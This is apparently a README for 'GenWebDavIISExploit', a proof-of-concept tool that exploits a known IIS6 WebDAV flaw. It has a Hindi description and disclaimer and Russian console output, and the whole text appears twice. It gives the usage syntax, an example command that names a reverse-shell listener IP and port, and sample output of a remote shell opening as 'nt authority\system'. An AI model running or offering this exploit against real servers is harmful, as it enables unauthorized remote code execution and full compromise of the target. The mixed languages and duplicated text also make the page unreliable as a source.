
यह एक PoC उपकरण है जो IIS6 के WebDAV घटक में एक ज्ञात भेद्यता के लिए शोषण प्रदर्शित करता है
GenWebDavIISExploit एक PoC उपकरण है जो IIS6 के WebDAV घटक में ज्ञात कमजोरी के शोषण को प्रदर्शित करता है। यह उपकरण शैक्षिक और अनुसंधान उद्देश्यों के लिए डिज़ाइन किया गया है ताकि यह दिखाया जा सके कि इस कमजोरी का उपयोग रिमोट सर्वर पर मनमाना कोड निष्पादित करने के लिए कैसे किया जा सकता है।
यह परियोजना केवल शैक्षिक उद्देश्यों के लिए है। इस उपकरण का उपयोग जिम्मेदारी से और केवल उन प्रणालियों पर करें जिनके आप स्वामी हैं या जिनके परीक्षण करने की स्पष्ट अनुमति है। कंप्यूटर सिस्टम में अनधिकृत पहुंच अवैध है।
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
[*] Подключение к цели 192.168.1.10 на порту 80...
[*] Отправка специально сформированного HTTP-запроса для эксплуатации уязвимости...
[*] Длина полезной нагрузки: 1744 байт
[*] Ожидание обратного соединения...
[+] Ответ от цели:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0
[+] Получено обратное соединение от 192.168.1.10:12345
[+] Удаленный доступ успешно установлен!
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> ipconfig
Настройка IP Windows
Адаптер Ethernet Local Area Connection:
DNS-суффикс подключения . . . . . : example.local
IPv4-адрес. . . . . . . . . . . . : 192.168.1.10
Маска подсети . . . . . . . . . . : 255.255.255.0
Основной шлюз . . . . . . . . . . : 192.168.1.1
GenWebDavIISExploit एक PoC उपकरण है जो IIS6 पर WebDAV घटक में ज्ञात कमजोरी के शोषण को प्रदर्शित करता है। यह उपकरण शैक्षिक और अनुसंधान उद्देश्यों के लिए बनाया गया है ताकि यह दिखाया जा सके कि इस कमजोरी का उपयोग रिमोट सर्वर पर मनमाना कोड निष्पादित करने के लिए कैसे किया जा सकता है।
यह परियोजना केवल शैक्षिक उद्देश्यों के लिए है। इस उपकरण का उपयोग जिम्मेदारी से और केवल उन प्रणालियों पर करें जिनके आप स्वामी हैं या जिनके परीक्षण करने की स्पष्ट अनुमति है। कंप्यूटर सिस्टम में अनधिकृत पहुंच अवैध है।
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
[*] Подключение к цели 192.168.1.10 на порту 80...
[*] Отправка специально сформированного HTTP-запроса для эксплуатации уязвимости...
[*] Длина полезной нагрузки: 1744 байт
[*] Ожидание обратного соединения...
[+] Ответ от цели:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0
[+] Получено обратное соединение от 192.168.1.10:12345
[+] Удаленный доступ успешно установлен!
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> ipconfig
Настройка IP Windows
Адаптер Ethernet Local Area Connection:
DNS-суффикс подключения . . . . . : example.local
IPv4-адрес. . . . . . . . . . . . : 192.168.1.10
Маска подсети . . . . . . . . . . : 255.255.255.0
Основной шлюз . . . . . . . . . . : 192.168.1.1